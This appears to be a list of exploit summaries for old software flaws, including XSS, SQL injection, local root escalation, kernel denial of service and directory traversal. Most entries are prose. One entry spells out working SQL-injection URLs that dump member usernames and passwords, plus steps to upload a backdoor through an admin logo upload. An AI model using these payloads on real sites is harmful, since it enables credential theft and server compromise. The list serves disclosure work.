MemHT Portal 4.0.1 is vulnerable to a persistent cross-site scripting vulnerability. An attacker can inject malicious JavaScript code into the user agent field of the login page, which will be executed when an administrator views the statistics page. This can be used to steal cookies and hijack user sessions.
This exploit uses socketpair to create a process in the state 'Running' which is not killable via kill -KILL and eats 100% CPU and all available internal file descriptors in the kernel.
An attacker can inject malicious SQL queries into the vulnerable parameter 'category' of the Jurpopage 0.2.0 software. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
This exploit allows a local user to gain root privileges on a system running Red Hat Enterprise Linux 5. The exploit is based on a vulnerability in the SystemTap package, which allows a local user to execute arbitrary code with root privileges. The exploit works by creating a malicious SystemTap configuration file, which is then loaded by the staprun command. The malicious configuration file contains a printf command that will execute a shell script with root privileges.
This exploit is due to a bad limit on the max size of the stack for 32bit apps on a 64bit OS. Instead of them being limited to 1/4th of a 32bit address space, they're limited to 1/4th of a 64bit address space. This triggers a BUG() as the stack tries to expand around the address space when shifted. The memory usage also explodes within the kernel from a single 128k allocation in userland, which isn't accounted for by any task so it won't be terminated by the OOM killer.
A directory traversal vulnerability exists in VMware 2 Web Server, which allows an attacker to access sensitive files outside of the web root directory. By sending a specially crafted HTTP request, an attacker can traverse the directory structure and access files outside of the web root directory. This can lead to information disclosure and other attacks.
The vulnerability exists due to failure in the 'frog/app/controllers/UserController.php' script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the 'frog/app/controllers/PageController.php' script to properly sanitize user-supplied input in 'page[keywords]' variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials.
The vulnerability exists due to failure in the 'wolf/app/controllers/UserController.php' script to properly verify the source of HTTP request and to properly sanitize user-supplied input in 'user[name]' variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
NCH Office Intercom is prone to a remote denial of service attack when parsing a maliscous SIP invite request. If the Content-Length field has a value of -1 (or a large integer such as 3645363) the server will crash due to a NULL pointer reference, causing an access violation.
Exploit this vulnerability comment must be enabled (default == enable). Enterprise Portal Version: http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23 and http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23. E-commerce Version: http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23. Upload backdoor: Administrator Panel: http://server/admin/ System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> Browse Right Now -> view properties [the URL is Ur backdoor].
Services By CQR